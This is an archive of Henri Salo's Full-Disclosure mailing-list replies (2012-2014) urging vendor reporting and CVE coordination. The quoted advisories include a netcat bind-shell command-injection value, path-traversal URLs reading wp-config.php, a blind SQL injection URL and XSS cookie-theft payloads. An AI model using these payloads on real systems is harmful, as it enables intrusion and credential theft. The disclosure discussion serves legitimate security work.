Re: [Full-disclosure] A question for the list - WordPress plugin inspections

2014-02-19 Thread Henri Salo
On Wed, Feb 19, 2014 at 08:58:49PM +, Harry Metcalfe wrote:
> Hi Seth,
> 
> There really isn't time for us to do that, in the context of an
> inspection. It's a very light-touch assessment.
> 
> When we find vulnerabilities we do also report those, after working
> with the vendor. And they are more detailed. For example:
> 
> https://security.dxw.com/advisories/moving-any-file-php-user-has-access-to-in-bp-group-documents-1-2-1/
> 
> Harry

People behind plug...@wordpress.org can help you with coordination. They can
also disable plugins so that there won't be new installations before the maintainer
fixes the issues. Note that the security@ address should not be contacted when dealing
with plugin issues. It is important to get vulnerabilities fixed in the upstream
codebase. I can also help you with communication, verification and such in my
own time.

---
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Romanian hacker unknown string

2014-01-17 Thread Henri Salo
On Fri, Jan 17, 2014 at 05:07:00PM +0530, Asheesh Tripathi wrote:
> Yes Tried to reset password of one user account with this string

> >> "rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1"

At least you have a good password policy.

---
Henri Salo



Re: [Full-disclosure] Happy Holidays / Xmas Advisory

2013-12-27 Thread Henri Salo
On Thu, Dec 26, 2013 at 08:51:26AM -0800, Gage Bystrom wrote:
> And it just so kindly tells you where everything is located, just in case
> you wanted to know
> 
> Ex:
> 
> http://demo.fatfreecrm.com/passwords/
> 
> I half expected to find password hashes but oh well that's life. It is a
> great "hack me" application when you can find random vulns simply by
> dicking around on your phone.

Please report issues to GitHub (if you care). As you can see, the project reacts
to security issues. Three days at Christmas time is not bad:

https://github.com/fatfreecrm/fat_free_crm/issues/300
https://github.com/fatfreecrm/fat_free_crm/wiki/Fixing-security-vulnerabilities-(27th-Dec-2013)

---
Henri Salo



Re: [Full-disclosure] Happy Holidays / Xmas Advisory

2013-12-24 Thread Henri Salo
On Tue, Dec 24, 2013 at 11:26:15AM +0100, joernchen wrote:
> A rather informal advisory on Fat Free CRM (http://fatfreecrm.com/):

I created https://github.com/fatfreecrm/fat_free_crm/issues/300 for tracking.

---
Henri Salo



Re: [Full-disclosure] ClipBucket v2.6-r738 Arbitrary File Upload 0-Day

2013-11-16 Thread Henri Salo
On Sat, Nov 16, 2013 at 12:53:38AM -0600, Rob Whitney wrote:
> This vulnerability was actually discovered after a client's website was
> hacked by a group spreading a Pro-Islamic message. Here is a redacted
> version of the access log at the point of exploitation.


Disclosure date 2009-10-19
http://osvdb.org/show/osvdb/59051

A lot of software using that piece of code is still vulnerable, especially
plugins/modules. There are also a lot of ongoing attacks using this in my honeypots
(AS29422). The attacks do not verify software version numbers or the existence of
the software. They just attack with all payloads and hope that some sites get
infected. I have been actively sending abuse reports about those and have notified
several project upstreams about the vulnerability. You can contact me off the
list if you are interested in getting more information.

---
Henri Salo



Re: [Full-disclosure] XSS and CS vulnerabilities in aCMS

2013-08-01 Thread Henri Salo
On Thu, Aug 01, 2013 at 04:11:31PM +0300, MustLive wrote:
> 
> Timeline:
> 
> 
> 2013.03.04 - informed developers about part of the vulnerabilities.
> 2013.04.03 - informed developers about another part of the vulnerabilities.
> 2013.04.07 - informed developers about another part of the vulnerabilities.
> 2013.05.24 - announced at my site.
> 2013.05.25 - informed developers about another part of the vulnerabilities.
> 2013.05.26 - informed developers about another part of the
> vulnerabilities. In all cases the developers just ignored all
> messages via different e-mails and contact form.
> 2013.07.31 - disclosed at my site (http://websecurity.com.ua/6535/).

How exactly did the vendor ignore you in the 2013.05.26 entry?

---
Henri Salo



Re: [Full-disclosure] 0day Vulnerability in VLC (this is my first release of the vuln anywhere)

2013-04-23 Thread Henri Salo
On Tue, Apr 23, 2013 at 02:58:43PM +0300, Georgi Guninski wrote:
> please don't spam your opinion on every message you dislike.

I did not dislike the message. I believe they are making some good research.

> counterspam:  if you ask me, don't notify the vendor unless there is
> some good external reason.

The point of contacting the vendor is to get the issues fixed without creating
unnecessary security risks to users of the program.

To quote Jay: "just because of the lack of testing so far", so now he knows I can
help if needed. You are free to ignore my emails if you consider them spam.
I sure hope I am not the only person on the list who wishes for responsible
disclosure.

---
Henri Salo



Re: [Full-disclosure] 0day Vulnerability in VLC (this is my first release of the vuln anywhere)

2013-04-22 Thread Henri Salo
On Mon, Apr 22, 2013 at 07:31:07AM -0400, jay van wrote:
> If VLC media player is launched in QT mode and the user is on Windows NT
> (any version of Windows so far as tested) connected to the internet, there
> is a vulnerability in the handling of unicast packets. The proof of concept
> code is in development and should be ready for publishing within the next 2
> weeks. More in-depth vulnerability information will be released with the
> proof of concept. This is a joint effort (the POC (proof of concept) code
> and vuln discovery) by 2 security firms: 4sData IT Solutions and another
> firm that would like to remain nameless for the time being. This
> vulnerability exposes almost everyone using VLC media player (unless on
> Linux systems, and that's just because of the lack of testing so far; they may
> still be found to be exposed). Thank you for your time, and if interested
> please respond and let me know.
> 
>  - Jay @ 4sData-IT-Solutions (www.4sdata.com - coming soon)
> 
>   P.S. Launching 4sData this week to coincide with the VLC vuln.

Please follow responsible disclosure and report issues first to the vendor and
go public after waiting for a fix (or no reply). VLC usually replies to
important issues very fast. Please contact me in case you need a hand in
communication.

---
Henri Salo



Re: [Full-disclosure] Allegro.pl XSS [0-day]

2013-04-11 Thread Henri Salo
On Thu, Apr 11, 2013 at 06:27:28PM +0200, Kacper Szczesniak wrote:
> Hi All!
> 
> I was looking for a 19" rack mount today and found this XSS instead:
> http://allegro.pl/listing/listing.php?string=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
> 
> it turns out to be a custom data-headline attribute that is not properly 
> escaped
> 
> tested on Firefox 20, Chrome and others need an xss filter bypass
> 
> kacper

And? Did you report this to the allegro.pl owners? Even to the security@ and
abuse@ addresses? How is this a 0day issue?

---
Henri Salo



Re: [Full-disclosure] WP FuneralPress - Stored XSS in Guestbook

2013-03-31 Thread Henri Salo
On Sun, Mar 31, 2013 at 11:58:59AM +0100, Peter Westwood wrote:
> On 31 Mar 2013, at 08:25, Henri Salo  wrote:
> 
> > On Sun, Mar 31, 2013 at 11:56:05AM +1300, Rob Armstrong wrote:
> >> # WP FuneralPress - stored xss in guestbook
> >> #
> >> # "FuneralPress is an online website obituary management and guest book
> >> program for funeral homes and cemeteries"
> >> # http://wpfuneralpress.com/
> >> #
> >> # tested on: funeralpress version 1.1.6 / wordpress version 3.5.1
> >> #
> >> # impact:
> >> #   malicious script execution as wordpress administrator
> >> #
> >> # author: robarmstrong.t...@gmail.com
> > 
> > Did you report this to the plugin developer? Is this fixed in some version?
> > Does this have a CVE identifier? It's pretty disturbing if someone actually uses
> > vulnerabilities like these to infect others.
> 
> Also, I guess this wasn't reported to the plugin review team at WP.org so I 
> forwarded it to them there - there is a free version of this plugin available 
> for download there
> 
> -- 
> Peter Westwood
> Automattic | WordPress.com | WordPress.org

I did that too. Forgot to include it in my email, sorry.

---
Henri Salo



Re: [Full-disclosure] WP FuneralPress - Stored XSS in Guestbook

2013-03-31 Thread Henri Salo
On Sun, Mar 31, 2013 at 11:56:05AM +1300, Rob Armstrong wrote:
> # WP FuneralPress - stored xss in guestbook
> #
> # "FuneralPress is an online website obituary management and guest book
> program for funeral homes and cemeteries"
> # http://wpfuneralpress.com/
> #
> # tested on: funeralpress version 1.1.6 / wordpress version 3.5.1
> #
> # impact:
> #   malicious script execution as wordpress administrator
> #
> # author: robarmstrong.t...@gmail.com

Did you report this to the plugin developer? Is this fixed in some version? Does
this have a CVE identifier? It's pretty disturbing if someone actually uses
vulnerabilities like these to infect others.

---
Henri Salo



Re: [Full-disclosure] XSS vulnerability on WP-Banners-Lite (wordpress plugin)

2013-03-25 Thread Henri Salo
On Mon, Mar 25, 2013 at 08:53:28AM -0300, Fernando A. Lagos B. wrote:
> I. Background
> --
> [-] Affected plugin: WP Banners Lite
> [-] Plugin Description: The plugin easily allows you to manage ad
> banners on your site.
> [-] Plugin URL: http://wordpress.org/extend/plugins/wp-banners-lite/
> [-] Tested Version: 1.29, 1.31, 1.40
> [-] Reported: YES - but no answer
> [-] Report Date: 03/12/13
> [-] Published:
> http://blog.zerial.org/seguridad/vulnerabilidad-en-plugin-para-wordpress-afecta-a-mas-de-200-sitios/

You can report the next issue to the plugins@wordpress.org address and they will
remove the plugin from showing up in the plugin index site[1], or whatever it is
called, so users can't install it using the WordPress administrator interface before
the developer of the plugin has fixed the vulnerability. I will send the
plugins guys an email right now to get the process going. You can also directly
contact me in case you need help coordinating issues. Have a great day.

1: http://wordpress.org/extend/plugins/wp-banners-lite/

--
Henri Salo



Re: [Full-disclosure] Fwd: Remote command injection vulnerability in Rosewill RSVA11001 (Hi3515 based)

2013-03-25 Thread Henri Salo
On Sun, Mar 24, 2013 at 05:43:43PM -0400, Eric Urban wrote:
> I have been hacking on a Rosewill RSVA11001 for a while now, something to
> suck up my free time. I had pulled apart the firmware previously but did
> not succeed in finding a way to get a shell on the device. The box is
> Hi3515 based; I found an exploit for another similar box (Ray Sharp) but it
> did not work. The Rosewill firmware seems to use an executable that listens
> on two ports rather than one when communicating with the Windows-based control
> software. Port 8000 is now the command port rather than 9000; 9000 is used for
> video only. After playing with the included Windows application I
> eventually did a strings on the 'hi_dvr' executable that is the user space
> program that controls the interface to the thing. I found this gem:
> 
> /mnt/ntpdate -q %s > /tmp/tmpfs/ntptmp
> 
> So I used the windows software to set the NTP host to
> 
> a;/usr/bin/nc -l -p 5555 -e /bin/sh&

Did you report this to the vendor?

--
Henri Salo
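The injection Eric describes comes from formatting the NTP host into a shell command line. As an added example (not code from this thread or from the Rosewill firmware), here is that pattern beside a hardened replacement: a strict hostname whitelist and a shell-free execv. The path `/mnt/ntpdate` and the output file come from the thread; every function name and the sample inputs are assumptions.

```c
#include <ctype.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* The pattern described in the thread (reconstructed, not the firmware's
 * source): the NTP host received from the control software is formatted
 * into a command line and handed to system(), so the shell interprets any
 * ';', '&', '|', '`' or '$(' inside the host as further commands. */
int run_ntpdate_vulnerable(const char *host)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "/mnt/ntpdate -q %s > /tmp/tmpfs/ntptmp", host);
    return system(cmd);
}

/* Whitelist check: accept only a hostname or dotted IPv4 address made of
 * letters, digits, '-' and '.', with RFC 1123 label rules (no empty label,
 * no label starting or ending with '-', labels <= 63 bytes, total <= 253).
 * Every shell metacharacter fails the check. Rejecting a leading '-' also
 * stops the host from being parsed as an ntpdate option once it is passed
 * as a separate argv element. */
int ntp_host_is_safe(const char *host)
{
    size_t len = strlen(host);
    size_t label_len = 0;

    if (len == 0 || len > 253)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (c == '.') {
            /* empty label ("a..b", ".a") or label ending in '-' */
            if (label_len == 0 || host[i - 1] == '-')
                return 0;
            label_len = 0;
            continue;
        }
        if (!isalnum(c) && c != '-')
            return 0;
        if (c == '-' && label_len == 0)
            return 0;
        if (++label_len > 63)
            return 0;
    }
    /* last label must be non-empty and must not end in '-' */
    return label_len > 0 && host[len - 1] != '-';
}

/* Hardened replacement: validate, then fork/execv without a shell. The host
 * travels as one argv element, so nothing parses it for metacharacters; the
 * '>' redirection of the original is done by the parent with dup2().
 * Returns the child's exit status, -1 if the host fails validation and
 * -2 on fork/wait failure (exec failure surfaces as status 127). */
int run_ntpdate_safe(const char *ntpdate_path, const char *host,
                     const char *outfile)
{
    if (!ntp_host_is_safe(host))
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -2;
    if (pid == 0) {
        int fd = open(outfile, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd < 0)
            _exit(127);
        dup2(fd, STDOUT_FILENO);
        close(fd);
        char *const argv[] = { (char *)ntpdate_path, "-q", (char *)host, NULL };
        execv(ntpdate_path, argv);
        _exit(127);               /* only reached if execv fails */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -2;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -2;
}

int main(void)
{
    /* Constructed sample inputs: legitimate hosts and hostile ones shaped
     * like the thread's injection (a shell metacharacter after a host). */
    const char *samples[] = { "pool.ntp.org", "192.168.1.1",
                              "pool.ntp.org;id", "a&b", "-d", "" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-20s -> %s\n", samples[i],
               ntp_host_is_safe(samples[i]) ? "accepted" : "rejected");
    return 0;
}
```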



Re: [Full-disclosure] Vulnerabilities in SWFUpload in multiple web applications: WordPress, Dotclear, InstantCMS, AionWeb and others

2013-03-18 Thread Henri Salo
So how many of these did you report to the developers of the software? Please
give links to the bug tracker, changelog or similar.

---
Henri Salo



Re: [Full-disclosure] XSS vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django and aCMS

2013-03-02 Thread Henri Salo
On Fri, Mar 01, 2013 at 11:50:00PM +0200, MustLive wrote:
> I'm resending my letter from February 23, 2013 (since FD was not working
> that day).
> 
> After my previous list of vulnerable software with ZeroClipboard.swf, here
> is a list of software with ZeroClipboard10.swf. These are Cross-Site
> Scripting vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django
> and aCMS.
> 
> Earlier I wrote about Cross-Site Scripting vulnerabilities in
> ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote
> that this is a very widespread flash file and it's placed at tens of thousands
> of web sites. And it's used in hundreds of web applications. Among them are
> em-shorty, RepRapCalculator, Fulcrum (CMS), Django and aCMS. And there are
> many other vulnerable web applications with ZeroClipboard10.swf (some of
> them also contain ZeroClipboard.swf).

So did you report this vulnerability to those projects? Even to security@ or a
similar address? I noticed this vulnerability from WordPress plugins. Did you
report those? Did you ask for CVE identifiers?

--
Henri Salo



Re: [Full-disclosure] Vulnerabilities in WordPress Attack Scanner for WordPress

2013-01-30 Thread Henri Salo
On Wed, Jan 30, 2013 at 08:31:57PM +0200, MustLive wrote:
> Information Leakage (WASC-13):
> 
> http://site/wp-content/plugins/path/data.txt
> http://site/wp-content/plugins/path/archive.txt
> 
> Folder "path" can be WP-Attack-Scanner or WP-Attack-Scanner-Free.
> 
> Unrestricted access to the data - they can be accessed in the browser
> without authorization. Even though the data is encrypted, by default the
> password is "changepassword". If the password was not changed, then the data
> is easily decrypted. If it was changed, then the password can be picked up.

What data is stored to those files?

--
Henri Salo



Re: [Full-disclosure] Looking for security contacts

2013-01-22 Thread Henri Salo
On Tue, Jan 22, 2013 at 09:45:39AM +0100, DefenseCode wrote:
> Hi,
> 
> We're looking for security contacts of the following companies:
> - US Robotics
> - Asus
> - NetGear
> - Zyxel
> - TP-Link
> - D-Link
> 
> Regards,
> Leon Juranic
> CEO
> DefenseCode
> http://www.defensecode.com/

Good luck.

- Henri



Re: [Full-disclosure] Wordpress Pingback Port Scanner

2013-01-19 Thread Henri Salo
On Sat, Jan 19, 2013 at 08:53:24PM +0200, MustLive wrote:
> And when WordPress developers turned it on in WordPress 3.5 they returned
> the hole back to the masses. Earlier, for WP 2.6 - 3.4.2, only those web sites
> which had turned it on were vulnerable; since WP 3.5 all web sites
> would be vulnerable again.

First of all I am impressed that you, MustLive, have studied this issue so much
and given valuable information to this mailing list. Thank you. I'll bet you
can give a lot to the community if you start to find vulnerabilities in
important software and don't waste time on non-issues (not saying that you
haven't done this already on some level).

Could you give me references where WordPress developers enabled XML-RPC again?
In my opinion this is not a wise decision. The interface should have at least
some kind of ACL enabled. I have no idea what is now allowed or whether there is a
possibility to configure the interface. Last time I tested this interface it
did need authentication to do some of the tasks. I did not check all of them.

- Henri Salo



Re: [Full-disclosure] XSS, LFI and SQL Injection Vulnerabilities in Achievo

2012-11-01 Thread Henri Salo
On Thu, Nov 01, 2012 at 02:12:10PM +0200, Netsparker Advisories wrote:
> Information
> 
> Name :  XSS, LFI and SQL Injection Vulnerabilities in Achievo
> Software :  Achievo 1.4.5 and possibly below.
> Vendor Homepage :  http://www.achievo.org
> Vulnerability Type :  Cross-Site Scripting, Local File Inclusion and SQL
> Injection
> Severity :  Critical
> Researcher :  Canberk Bolat
> Advisory Reference :  NS-12-016
> 
> Description
> 
> Achievo is a flexible web-based resource management tool for business
> environments. Achievo's resource management capabilities will enable
> organisations to support their business processes in a simple, but
> effective manner.
> 
> Details
> 
> Achievo is affected by XSS, LFI and SQL Injection vulnerabilities in
> version 1.4.5.
> XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid,
> atkselector, atkfilter, searchString)
> LFI:
> http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3
> SQL Injection:
> http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3
> You can read the full article about Cross-Site Scripting, LFI and SQL
> Injection vulnerabilities from here:
> 
> Cross-site Scripting (XSS):
> http://www.mavitunasecurity.com/crosssite-scripting-xss/
> Local File Inclusion: http://www.mavitunasecurity.com/local-file-inclusion/
> Blind SQL Injection: http://www.mavitunasecurity.com/blind-sql-injection/
> 
> Solution
> 
> -
> 
> Advisory Timeline
> 
> 23/01/2011 - First contact
> 25/02/2012 - Second contact - No response
> 01/11/2012 - Advisory released
> 
> Credits
> 
> It has been discovered on testing of Netsparker, Web Application Security
> Scanner - http://www.mavitunasecurity.com/netsparker/.
> 
> References
> 
> Vendor Url / Patch : -
> MSL Advisory Link :
> http://www.mavitunasecurity.com/xss-lfi-and-sql-injection-vulnerabilities-in-achievo/
> Netsparker Advisories :
> http://www.mavitunasecurity.com/netsparker-advisories/
> 
> About Netsparker
> 
> Netsparker® can find and report security issues such as SQL Injection and
> Cross-site Scripting (XSS) in all web applications regardless of the
> platform and the technology they are built on. Netsparker's unique
> detection and exploitation techniques allow it to be dead accurate in
> reporting, hence it's the first and the only False Positive Free web
> application security scanner.

Where did you report this vulnerability? The Achievo project does reply to emails
and fix security vulnerabilities. Does this vulnerability have a CVE identifier,
which would help in communication?

I can report this to the project again and request a CVE identifier if needed.
Please confirm that this is OK for you.

- Henri Salo



Re: [Full-disclosure] Cookie stealing and XSS vulnerable in Zenphoto version 1.4.3.2

2012-10-11 Thread Henri Salo
On Tue, Oct 02, 2012 at 07:16:11AM +0100, Scott Herbert wrote:
> -
> Affected products:
> -
> 
> Product : Zenphoto 1.4.3.2 (and maybe older) fixed in 1.4.3.3
> Affected function:printPublishIconLink
> 
> --
> Details:
> --
> 
> The file admin-news-articles.php calls the function printPublishIconLink
> which generates HTML from data stored in the $_GET super global. This can be
> used to generate an XSS attack or, more seriously, as an admin user needs to be
> logged in to access the page admin-news-articles.php, a cookie stealing
> script.
> 
> Example code:
> http://127.0.0.1/zenphoto/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C>
> 
> 
> Suggested fix:
> 
> 
> Sanitize the $_GET super global on lines 1637 through 1641 in
> zenpage-admin-functions.php file
> 
> 
> Timeline:
> 
> 
> 12-Sept-2012  Zenphoto and UK-CERT informed
> 18-Sept-2012 Zenphoto confirmed and fixed (see
> http://www.zenphoto.org/trac/changeset/10836).
> 1-Oct-2012 Zenphoto 1.4.3.3 released fixing hole.
> 
> --
> Scott Herbert Cert Web Apps (Open)
> http://blog.scott-herbert.com/
> Twitter @Scott_Herbert

Identifier CVE-2012-4519 has been assigned for this issue 
http://www.openwall.com/lists/oss-security/2012/10/11/4

- Henri Salo



Re: [Full-disclosure] Cookie stealing and XSS vulnerable in Zenphoto version 1.4.3.2

2012-10-08 Thread Henri Salo
On Tue, Oct 02, 2012 at 07:16:11AM +0100, Scott Herbert wrote:
> -
> Affected products:
> -
> 
> Product : Zenphoto 1.4.3.2 (and maybe older) fixed in 1.4.3.3
> Affected function:printPublishIconLink
> 
> --
> Details:
> --
> 
> The file admin-news-articles.php calls the function printPublishIconLink
> which generates HTML from data stored in the $_GET super global. This can be
> used to generate an XSS attack or, more seriously, as an admin user needs to be
> logged in to access the page admin-news-articles.php, a cookie stealing
> script.
> 
> Example code:
> http://127.0.0.1/zenphoto/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C>
> 
> 
> Suggested fix:
> 
> 
> Sanitize the $_GET super global on lines 1637 through 1641 in
> zenpage-admin-functions.php file
> 
> 
> Timeline:
> 
> 
> 12-Sept-2012  Zenphoto and UK-CERT informed
> 18-Sept-2012 Zenphoto confirmed and fixed (see
> http://www.zenphoto.org/trac/changeset/10836).
> 1-Oct-2012 Zenphoto 1.4.3.3 released fixing hole.
> 
> --
> Scott Herbert Cert Web Apps (Open)
> http://blog.scott-herbert.com/
> Twitter @Scott_Herbert

Hello list,

Zenphoto 1.4.3.3 (tar.gz 3fe44951e33e726d2bba229880885075) is still affected by
this vulnerability. Please notice "OSVDB is not aware of a solution for this
vulnerability. The original disclosure states that the vendor claimed to have
fixed this issue in version 1.4.3.3, but Secunia has confirmed it to still be
vulnerable." from http://osvdb.org/85899, and I verified this manually. Does
this vulnerability have a CVE identifier?

- Henri Salo



Re: [Full-disclosure] cloudsafe365 for wordpress: file disclosure

2012-09-05 Thread Henri Salo
On Tue, Aug 28, 2012 at 09:59:19PM +1000, craig deveson wrote:
> Issue has been resolved in version 1.47

In which revision? This looks like an up-to-date repository:
http://plugins.svn.wordpress.org/cloudsafe365-for-wp/

- Henri Salo



Re: [Full-disclosure] cloudsafe365 for wordpress: file disclosure

2012-08-28 Thread Henri Salo
On Tue, Aug 28, 2012 at 11:00:25AM +0200, Christian Sciberras wrote:
> So this plugin supposedly helps securing a website?

I do not know anything about this plugin but at least we can coordinate the 
fixes or get the plugin disabled so that more people don't start using it.

- Henri Salo



Re: [Full-disclosure] cloudsafe365 for wordpress: file disclosure

2012-08-28 Thread Henri Salo
On Tue, Aug 28, 2012 at 10:29:46AM +0200, Jan van Niekerk wrote:
> This wordpress security plugin lets you read arbitrary files on the
> system.  Looking at the code, there will be plenty of stuff like this.
> 
> Demo:
>   
> http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
>   
> http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php
> 
> Disclosure timeline:
>  * Today: visit wordpress.org
>  * Try to report bug
>  * System wants login
>  * Visit web site: vendor has no e-mail address and stupid one-liner
> contact form and hidden name
>  * Stuff it, I'm not going to phone them

I can verify and report this. Could you list all the vulnerabilities you can
find in the plugin? You can also contact the plug...@wordpress.org address in
case you find vulnerabilities in WordPress plugins in the future.

- Henri Salo



Re: [Full-disclosure] XSS and SQL Injection Vulnerabilities in Jara

2012-08-23 Thread Henri Salo
On Wed, Aug 22, 2012 at 12:33:37PM +0300, Netsparker Advisories wrote:
> Information
> 
> Name :  XSS and SQL Injection Vulnerabilities in Jara
> Software :  Jara 1.6 and possibly below.
> Vendor Homepage :  http://sourceforge.net/projects/jara/
> Vulnerability Type :  Cross-Site Scripting and SQL Injection
> Severity :  Critical
> Researcher :  Canberk Bolat
> Advisory Reference :  NS-12-009
> 
> Description
> 
> An open source simple blog utilising the features of PHP 5 and MySQL
> 5. Supports multiple writers, categories, managing posts, static
> content pages and post comments as well as providing an intuitive
> administration panel.
> 
> Details
> 
> Jara is affected by XSS and SQL Injection vulnerabilities in version 1.6.
> 
> Example PoC urls are as follows :
> 
> SQL Injection Vulnerabilities
> http://example.com/login.php (POST - username)
> http://example.com/login.php (POST - password)
> http://example.com/admin/delete_page.php?id='%2BNSFTW%2B'
> http://example.com/admin/delete_post.php?id='%2BNSFTW%2B'
> http://example.com/admin/delete_category.php?id='%2BNSFTW%2B'
> http://example.com/admin/delete_user.php?id='%2BNSFTW%2B'
> http://example.com/admin/edit_page.php?id='%2BNSFTW%2B'
> http://example.com/admin/edit_user.php?id='%2BNSFTW%2B'
> http://example.com/admin/edit_post.php (POST - id)
> http://example.com/admin/edit_category.php (POST - id)
> 
> XSS Vulnerabilities
> http://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E
> http://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E
> http://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E
> http://example.com/login.php (POST - username)
> http://example.com/login.php (POST - password)
> http://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
> http://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E
> http://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E
> http://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
> http://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E
> http://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E
> http://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E
> http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
> 
> 
> You can read the full article about Cross-Site Scripting and SQL
> Injection vulnerabilities from here :
> 
> Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/
> SQL Injection: http://www.mavitunasecurity.com/sql-injection/
> 
> Solution
> 
> No patch released.
> 
> Advisory Timeline
> 
> 19/11/2011 - Couldn't find a contact e-mail
> 22/08/2012 - Vulnerability Released
> 
> Credits
> 
> It has been discovered on testing of Netsparker, Web Application
> Security Scanner - http://www.mavitunasecurity.com/netsparker/.
> 
> References
> 
> MSL Advisory Link :
> http://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-jara/
> Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/
> 
> About Netsparker
> 
> Netsparker® can find and report security issues such as SQL Injection
> and Cross-site Scripting (XSS) in all web applications regardless of
> the platform and the technology they are built on. Netsparker's unique
> detection and exploitation techniques allow it to be dead accurate in
> reporting, hence it's the first and the only False Positive Free web
> application security scanner.
> 
> -- 
> Netsparker Advisories, 
> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

Also some of these issues have been listed in OSVDB. You should check 
vulnerability databases before posting advisories.

http://osvdb.org/show/osvdb/76484
http://osvdb.org/show/osvdb/83346
http://osvdb.org/show/osvdb/83345
http://osvdb.org/show/osvdb/83330

You might want to send a message to the project owner via URL 
https://sourceforge.net/sendmessage.php?touser=2328649

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] XSS Vulnerabilities in LabWiki

2012-08-23 Thread Henri Salo
On Wed, Aug 22, 2012 at 12:32:29PM +0300, Netsparker Advisories wrote:
> Information
> 
> Name :  XSS Vulnerabilities in LabWiki
> Software :  LabWiki 1.5 and possibly below.
> Vendor Homepage :  http://www.bioinformatics.org/phplabware/labwiki/index.php
> Vulnerability Type :  Cross-Site Scripting
> Severity :  Critical
> Researcher :  Canberk Bolat
> Advisory Reference :  NS-12-008
> 
> Description
> 
> This wiki is powered by Qwiki Wiki, a minimalist PHP wiki engine
> originally developed by David Barrett, that uses plain text files to
> store data. The 'engine' is used to edit the data as well as to format
> it and present it as a web page. Significant modifications were done
> to the codes of this wiki for bugs and enhancements (XHTML compliance,
> UTF-8 encoding, backup maintenance, page deletion, etc.) by Santosh
> Patnaik (SP) who also largely seeded the wiki with new and old
> (non-wiki) documents.
> 
> Details
> 
> LabWiki is affected by XSS vulnerabilities in version 1.5. Example PoC
> urls are as follows :
> 
> http://example.com/recentchanges.php?page_no='"-->alert(0x00039E)&nothing=nothing
> http://example.com/index.php?page=What_is_wiki&from='"-->alert(0x0001C7)
> 
> You can read the full article about Cross-Site Scripting vulnerability
> from here :
> 
> Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/
> 
> Solution
> 
> No patch released.
> 
> Advisory Timeline
> 
> 15/11/2011 - First contact: No response
> 01/01/2012 - Second contact: No response
> 22/08/2012 - Advisory Released
> 
> Credits
> 
> It has been discovered on testing of Netsparker, Web Application
> Security Scanner - http://www.mavitunasecurity.com/netsparker/.
> 
> References
> 
> MSL Advisory Link :
> http://www.mavitunasecurity.com/xss-vulnerabilities-in-labwiki/
> Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/
> 
> About Netsparker
> 
> Netsparker® can find and report security issues such as SQL Injection
> and Cross-site Scripting (XSS) in all web applications regardless of
> the platform and the technology they are built on. Netsparker's unique
> detection and exploitation techniques allow it to be dead accurate in
> reporting hence it's the first and the only False Positive Free web
> application security scanner.
> 
> -- 
> Netsparker Advisories, 
> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

This looks a lot like what muuratsalo discovered some time ago: 
http://osvdb.org/show/osvdb/76934 (there are more similar issues in OSVDB if you 
